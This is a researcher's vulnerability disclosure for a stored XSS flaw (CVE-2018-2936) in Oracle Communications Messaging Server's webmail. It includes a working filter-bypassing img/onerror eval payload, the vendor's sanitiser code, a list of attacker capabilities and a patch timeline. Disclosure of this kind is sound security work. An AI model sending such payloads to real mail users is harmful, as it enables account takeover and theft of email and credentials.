An writeup on XSS vulnerability found in Oracle Communication Messaging Server’s web interface.

Description

Malicious email received and viewed on web client can lead to XSS in the iframe ending up in arbitrary JavaScript code execution in the context of the iframe. Injected XSS vector bypasses all the filters used to sanitizes email’s content. When users open the email, the script running in the background can perform various actions without the need of user interaction.


Reproduction Steps

1) Attacker sends an email with Content-Type: text/html containing following XSS vector.

<img/id='alert("XSS");'/alt="?"/src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR4nGP6zwAAAgcBApocMXEAAAAASUVORK5CYII="/onerror='eval(id)'/onload='eval(id)'>

2) JavaScript code inside onload attribute will be executed when user opens the email.


Exploitability

As the whole web client functions because of XML HttpRequest made using JavaScript for completing various tasks. A malicious script can lead to following:

  • Stealing password(if saved by browser)
  • Sending emails with victim’s identity
  • Reading all existing emails
  • Deleting all emails(Permanently)

Injected XSS vector can load external JavaScript(which can be easily updated). Loaded JavaScript can be used to store data at the external server.


Script used for filtering email content

_sanitize: function() {
    this._content = this._content.replace(/<script\s*(?:[^>]*?(?:src=(['"]?)([^>]*?)\1[^>]*)?)*>([\s\S]*?)<\/script>/gi, function() {
        console.warn("stripping script tag from message");
        return "";
    });
    this._content = this._content.replace(/<link\s+(?=[^>]*rel=['"]?stylesheet)([^>]*?href=(['"])([^>]*?)\4[^>\/]*)\/?>/gi, function() {
        console.warn("stripping link tag from message");
        return "";
    });
    this._content = this._content.replace(/<style([^>]*)>([\s\S]*?)<\/style>/gi, function(_13b6, _13b7, _13b8) {
        return _13b8.replace(/@import\s+[^;\n]*/gi, function() {
            console.warn("stripping @import statement from script tag in message");
            return "";
        }).replace(/expression\s*:[^;\n]*/gi, function() {
            console.warn("stripping expression statement from script tag in message");
            return "";
        });
    });
    this._content = this._content.replace(/(<[a-z][a-z0-9]*\s[^>]*)(?:(href|src)=(['"]?)([^>]*?)\3|style=(['"]?)([^>]*?)\5)([^>]*>)/gi, function() {
        console.warn("stripping expression statement from attribute in message");
        return "";
    });
    this._content = this._content.replace(/(<[a-z][a-z0-9]*\s[^>]*)(on[^=]*)=(['"]?)([^>]*?)([^>]*>)/gi, function() {
        console.warn("stripping inline event handler from attribute in message");
        return "";
    });
},
_sanitize: function() {
    this._content.body = this._content.body.replace(/(?:\s*<!DOCTYPE\s[^>]+>|<title[^>]*>[\s\S]*?<\/title>)/ig, function() {
        console.warn("stripping DOCTYPE or title tag from message");
        return "";
    });
}


Timeline

  • 31-01-2018 : Reported to Oracle.
  • 02-02-2018 : Bug acknowledged. Issue filled internally.
  • 24-02-2018 : Bug fixed in main codeline. Scheduled for a future update.
  • 14-07-2018 : CVE-2018-2936 assigned.
  • 18-07-2018 : Patch released.